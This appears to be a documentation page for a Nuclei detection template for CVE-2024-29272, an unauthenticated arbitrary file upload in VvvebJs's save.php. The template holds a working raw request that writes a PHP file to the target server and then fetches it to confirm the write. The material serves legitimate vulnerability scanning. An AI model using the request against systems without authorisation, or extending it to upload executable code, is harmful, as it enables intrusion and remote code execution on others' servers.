VvvebJs < 1.7.5 - Arbitrary File Upload
ID: CVE-2024-29272
Severity: medium
Author: s4e-io
Tags: cve,cve2024,file-upload,intrusive
Description
Section titled “Description”Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php.
YAML Source
Section titled “YAML Source”id: CVE-2024-29272
info: name: VvvebJs < 1.7.5 - Arbitrary File Upload author: s4e-io severity: medium description: | Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php. reference: - https://github.com/awjkjflkwlekfdjs/CVE-2024-29272/ - https://github.com/givanz/VvvebJs/issues/343 - https://nvd.nist.gov/vuln/detail/CVE-2024-29272 - https://vuldb.com/?id.257680 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2024-29272 cwe-id: CWE-434 epss-score: 0.00043 epss-percentile: 0.09538 cpe: cpe:2.3:a:vvvebjs:vvvebjs:1.7.4:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: vvvebjs product: vvvebjs fofa-query: icon_hash="524332373" tags: cve,cve2024,file-upload,intrusive
variables: num: "{{rand_int(1000, 9999)}}"
flow: http(1) && http(2)
http: - raw: - | POST /save.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
file=demo/landing/index.php&html={{md5(num)}}
matchers: - type: dsl dsl: - 'contains(body,"File saved")' - 'status_code == 200' condition: and internal: true
- raw: - | GET /demo/landing/index.php HTTP/1.1 Host: {{Hostname}}
matchers: - type: dsl dsl: - 'contains(body,"{{md5(num)}}")' - 'status_code == 200' condition: and# digest: 4a0a00473045022100e9edc1e3433577c0acd8bb8eaec06a6deba96942d82c9a1a0f92560719d03a4602200a82641b1d73e50bfa80a3fe23a31fa855a750bf506b1ab35219f4b8e464b245:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-29272.yaml"